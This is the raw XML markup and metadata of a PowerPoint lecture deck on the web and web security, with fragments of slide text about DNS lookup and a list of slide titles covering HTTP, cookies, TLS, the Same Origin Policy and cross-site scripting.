            <a:ext cx="4044697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18.25.0.23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18.25.0.23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212368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371600" y="2158917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199.16.156.6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199.16.156.70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199.16.156.102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199.16.156.230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Address: 199.16.156.102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199.16.156.230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199.16.156.6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199.16.156.70</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205602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2237-80CB-F343-89AA-39D5AA8F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3828-63BA-7A49-A40F-286EB9E882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Distributed, hierarchical database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Application-level protocol:   hosts and DNS servers communicate to resolve    names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Names are separated into components by dots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>lookup occurs top down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B421ECF-B62B-AF48-9286-494C3C72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820" y="2187365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A248740-37CF-F34E-AAB7-68E219939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4458" y="1595227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3110B12-EE30-F940-9487-49732621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445" y="2187365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A78260B-075A-704B-89FD-A247A5C8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20" y="2187365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3725BAE-0F18-D248-8EDF-28AFF91C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270" y="2187365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1713DF6-0A44-4A45-ADC3-B29490865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9670" y="1595227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EB11B4CE-640E-D74E-A559-F58E5928F2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70833" y="1595227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22F2A853-6DB4-1547-AEA9-78B79A4E5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833" y="1595227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F8C0132-4F01-0343-BDBF-39A9AAFF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589" y="3116052"/>
            <a:ext cx="1051871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pomona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493F2A3F-A5F2-C546-AE20-04340D69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870" y="3116052"/>
            <a:ext cx="91273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scripps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799377C-E701-7D4D-B5F4-1DF48577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61" y="3126456"/>
            <a:ext cx="63348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hmc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C0F3027-40A2-BA4E-9CE1-3E5A1850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470" y="2523915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9AC41F9D-F301-0B4B-804F-A27FF3E7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00" y="4044740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E8349371-21A3-ED43-AC7E-D4198765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04" y="4044740"/>
            <a:ext cx="732103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math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13284F9-009F-2748-AF97-D1F6F08FB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925" y="3452602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5675E26E-258A-9448-BDE9-3B03A6172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026" y="2519152"/>
            <a:ext cx="1781444" cy="6517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3EB0149D-73CF-8647-AB0E-3BE5E7824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646" y="2496927"/>
            <a:ext cx="627422" cy="6739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438D5DF9-77ED-1E4E-93C8-43F0D95B41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0363" y="3452602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80438D84-41DE-304C-B352-6FF89F3DB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292" y="4486394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A012293E-8AC5-2D4B-8E26-1E446B8A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850" y="5070594"/>
            <a:ext cx="1484682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134.173.66.214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2706C664-2014-3F44-92AF-27FB989F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145" y="3128752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EDB581D4-BD3C-7D4C-A4E2-40CB97052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370" y="2498515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5E0BE53D-4513-3D4B-AFD2-100259CD7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270" y="3489115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7" name="Text Box 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B66E6E48-6C68-7044-A5CE-31968FFA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215" y="4058128"/>
            <a:ext cx="1379985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176.32.98.166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3031F15-37CA-5C47-A704-8C6B4BFD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70" y="3128752"/>
            <a:ext cx="63348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cmc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F63A5503-D1E1-B042-9569-A15DCB9EAC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6700" y="2519152"/>
            <a:ext cx="1004174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6058F714-F0AE-B141-8BEC-BD186D8D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311" y="3106527"/>
            <a:ext cx="77839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pitzer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C4CEC2DC-2D8A-2E43-A226-3D1D6C835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0295" y="2496927"/>
            <a:ext cx="1456555" cy="708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7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6056</TotalTime>
  <Words>2854</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>474</Paragraphs>
  <Slides>43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Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Clarity</vt:lpstr>
      <vt:lpstr>Lecture 27: Web and Web Security</vt:lpstr>
      <vt:lpstr>What is the Internet?</vt:lpstr>
      <vt:lpstr>Continuing up the Network Stack…</vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>Domain Name System (DNS)</vt:lpstr>
      <vt:lpstr>Properties of DNS Mappings</vt:lpstr>
      <vt:lpstr>Properties of DNS Mappings (cont)</vt:lpstr>
      <vt:lpstr>Properties of DNS Mappings (cont)</vt:lpstr>
      <vt:lpstr>Domain Name System (DNS)</vt:lpstr>
      <vt:lpstr>DNS Lookup</vt:lpstr>
      <vt:lpstr>Course Evals!</vt:lpstr>
      <vt:lpstr>DNS Root Name Servers</vt:lpstr>
      <vt:lpstr>DNS Lookup</vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>Well-known Ports and Service Names </vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>HTTP Requests</vt:lpstr>
      <vt:lpstr>HTTP Responses</vt:lpstr>
      <vt:lpstr>HTTP Example</vt:lpstr>
      <vt:lpstr>Web Content</vt:lpstr>
      <vt:lpstr>Static and Dynamic Content</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>Dynamic Web Pages</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Tiny Web Server</vt:lpstr>
      <vt:lpstr>What can go wrong…</vt:lpstr>
      <vt:lpstr>Secure Socket Layer (SSL)</vt:lpstr>
      <vt:lpstr>SSL/TLS Handshake</vt:lpstr>
      <vt:lpstr>HTTPS</vt:lpstr>
      <vt:lpstr>Vulnerabilities by Year</vt:lpstr>
      <vt:lpstr>Vulnerability Occurrence in Applications</vt:lpstr>
      <vt:lpstr>Same Origin Policy (SOP)</vt:lpstr>
      <vt:lpstr>SOP Exceptions</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS attack vectors</vt:lpstr>
      <vt:lpstr>Example XSS attacks</vt:lpstr>
      <vt:lpstr>XSS Defenses</vt:lpstr>
      <vt:lpstr>So what's the take away…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25: Networking (cont'd)</dc:title>
  <dc:creator>Eleanor Birrell</dc:creator>
  <cp:lastModifiedBy>Sam Thomas</cp:lastModifiedBy>
  <cp:revision>97</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-24T15:51:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-06T21:14:47Z</dcterms:modified>
</cp:coreProperties>
</file>